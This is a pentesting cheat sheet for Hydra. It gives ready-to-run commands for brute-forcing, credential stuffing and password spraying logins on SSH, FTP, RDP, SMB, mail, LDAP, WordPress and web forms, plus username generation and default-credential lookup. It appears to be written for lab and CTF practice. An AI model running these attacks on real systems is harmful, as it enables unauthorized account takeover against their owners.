# Hydra User Guide * > **Note:** For HTTP form brute force, prefer **ffuf** over hydra — it is faster and more flexible. See the [ffuf guide](https://book.ice-wzl.xyz/ffuf#http-brute-force-login-forms). ## Username Generation with username-anarchy When you know a person's name but not their username format, generate variations: ```bash ./username-anarchy firstname lastname > /tmp/usernames.txt # Example: ./username-anarchy betty jayde > /tmp/usernames.txt # Generates: betty, bettyjayde, betty.jayde, bettyjay, bettyj, b.jayde, bjayde, jbetty, j.betty, jaydeb, jayde, bj, etc. ``` Then brute force with the generated list: ```bash hydra -t 4 -L /tmp/usernames.txt -p 'Texas123!@#' ssh://10.129.7.222 -F -vV ``` ## Installation ```bash sudo apt-get -y install hydra ``` *** ## Basic Syntax ```bash hydra [login_options] [password_options] [attack_options] [service_options] ``` *** ## Options Table | Option | Description | Example | | -------------------- | ------------------------------------- | ---------------------------- | | `-l LOGIN` | Single username | `hydra -l admin ...` | | `-L FILE` | Username list file | `hydra -L users.txt ...` | | `-p PASS` | Single password | `hydra -p password123 ...` | | `-P FILE` | Password list file | `hydra -P passwords.txt ...` | | `-t TASKS` | Parallel tasks (threads) | `hydra -t 4 ...` | | `-f` | Stop after first valid login | `hydra -f ...` | | `-F` | Stop after first valid login (global) | `hydra -F ...` | | `-s PORT` | Non-default port | `hydra -s 2222 ...` | | `-v` / `-V` | Verbose / Very verbose | `hydra -V ...` | | `-M FILE` | List of target servers | `hydra -M targets.txt ...` | | `-x MIN:MAX:CHARSET` | Generate passwords | `hydra -x 6:8:a1 ...` | *** ## Services Table | Service | Protocol | Example | | ----------------- | ---------------------- | ------------------------------------------------------- | | `ssh` | SSH | `hydra -l root -P pass.txt ssh://192.168.1.100` | | `ftp` | FTP | `hydra -l admin -P pass.txt ftp://192.168.1.100` | | `http-get` | HTTP Basic Auth | `hydra -L users.txt -P pass.txt example.com http-get /` | | `http-post-form` | Web Login Form (HTTP) | See below | | `https-post-form` | Web Login Form (HTTPS) | Same syntax as http-post-form, use for HTTPS | | `rdp` | Remote Desktop | `hydra -l admin -P pass.txt rdp://192.168.1.100` | | `smb` | SMB | `hydra -l admin -P pass.txt 192.168.1.100 smb` | | `mysql` | MySQL | `hydra -l root -P pass.txt mysql://192.168.1.100` | | `mssql` | MS SQL Server | `hydra -l sa -P pass.txt mssql://192.168.1.100` | | `vnc` | VNC | `hydra -P pass.txt vnc://192.168.1.100` | | `pop3` | POP3 Mail | `hydra -l user -P pass.txt pop3://mail.server.com` | | `imap` | IMAP Mail | `hydra -l user -P pass.txt imap://mail.server.com` | | `smtp` | SMTP Mail | `hydra -l user -P pass.txt smtp://mail.server.com` | | `ldap2` | LDAP | `hydra -L users.txt -P pass.txt 192.168.1.100 ldap2` | | `snmp` | SNMP | `hydra -P pass.txt 192.168.1.100 snmp` | *** ## Hydra Syntax * The correct hydra syntax is depended upon the service you are going after. For example if we want to hit ftp we should use: ## FTP ``` hydra -l user -P passlist.txt ftp://10.10.10.10 -F ``` ## SSH ``` hydra -l -P /usr/share/wordlists/rockyou.txt 10.10.10.10. -t 4 ssh ``` * `-l` is to specify the username * `P` is to specify a password list * `-t` is to specify the number of threads to run hydra with. * Note: Hydra recommends no more than 4 threads, however you can run it faster with `-t 16`. * `-F` means stop when you find your first valid password, highly recommend this option ``` hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://$host -f hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://$host -f -s 2222 hydra -L user.txt -P password.txt -f ssh://10.10.15.2:31294 -t 4 -w 15 -F ``` ## POST Web Form * Hydra can be used to brute force web logins as well. * Step 1: Determine the request made to the form (POST/GET) * Identify this in the network tab (developer tools), view the source code, or use Burp Suite. ### Syntax ``` hydra [options] target http-post-form "path:params:condition_string" ``` ### Success vs Failure Conditions | Condition | Description | Example | | ---------- | ----------------------------------------------- | ----------------------- | | `F=string` | **Failure** - Text in response when login fails | `F=Invalid credentials` | | `S=string` | **Success** - Text in response when login works | `S=Dashboard` | | `S=302` | **Success** - HTTP redirect on successful login | `S=302` | **Use `F=` when you know the failure message (most common):** ```bash hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials" # HTTPS form (e.g. phpLiteAdmin), limit threads for stability hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt TARGET_IP https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -t 3 ``` **Use `S=` when you know what success looks like:** ```bash hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302" hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=Welcome" ``` ### Full Example ``` hydra -l -P /usr/share/wordlists/rockyou.txt 10.10.211.150 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -vV ``` * `http-post-form` specifies the type of form * `/login url` the login page URL i.e. `http://dont-brute-force-me.com/login.php` * `:username` the form field name for the username * `^USER^` this tells hydra to use the username you specified * `password` the form field name for the password * `^PASS^` the password list specified in the command * `F=incorrect` the word that appears on the page if the login fails * `-vV` specifies very verbose output * Hydra non default ssh port: ``` hydra -t 16 -l sam -P /usr/share/wordlists/rockyou.txt 10.10.80.187 ssh -s 4567 -vV ``` ### HTTP-GET * Basic Authentication HTTP-GET ``` hydra -vV -l administrator -P 2023-200_most_used_passwords.txt 10.13.38.11 http-get /admin/ hydra -vV -t 2 -l administrator -P /usr/share/seclists/Passwords/seasons.txt 10.13.38.11 http-get /admin/ ``` ## Example Syntax ``` #Hydra brute force against SNMP hydra -P password-file.txt -v $ip snmp #Hydra FTP known user and rockyou password list hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp #Hydra SSH using list of users and passwords hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh #Hydra SSH using a known password and a username list hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh #Hydra SSH Against Known username on port 22 hydra $ip -s 22 ssh -l -P big_wordlist.txt #Hydra POP3 Brute Force hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V #Hydra SMTP Brute Force hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V #Hydra attack http get 401 login with a dictionary hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin #Hydra attack Windows Remote Desktop with rockyou hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip #Hydra brute force SMB user with rockyou hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb #Hydra brute force a Wordpress admin hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' login #SMB Brute Forcing hydra -L usernames.txt -P passwords.txt $ip smb -V -f #LDAP Brute Forcing hydra -L users.txt -P passwords.txt $ip ldap2 -V -f ``` ## Additional Syntax Formats ``` sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!" sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.211.150 http-post-form "/login:username=molly&password=^PASS^:F=incorrect" -V sudo hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin hydra -l lazie -P /opt/rockyou.txt imap://10.10.251.142 -vV ``` *** ### Credential Stuffing * Use `-C` with a colon-separated `user:pass` file instead of separate user and password lists ``` hydra -C user_pass.list ssh://10.100.38.23 ``` ### Password Spraying (SMB via NetExec) ``` netexec smb 10.100.38.0/24 -u usernames.list -p 'ChangeMe123!' ``` ### Default Credentials Cheat Sheet ``` pip3 install defaultcreds-cheat-sheet creds search linksys ```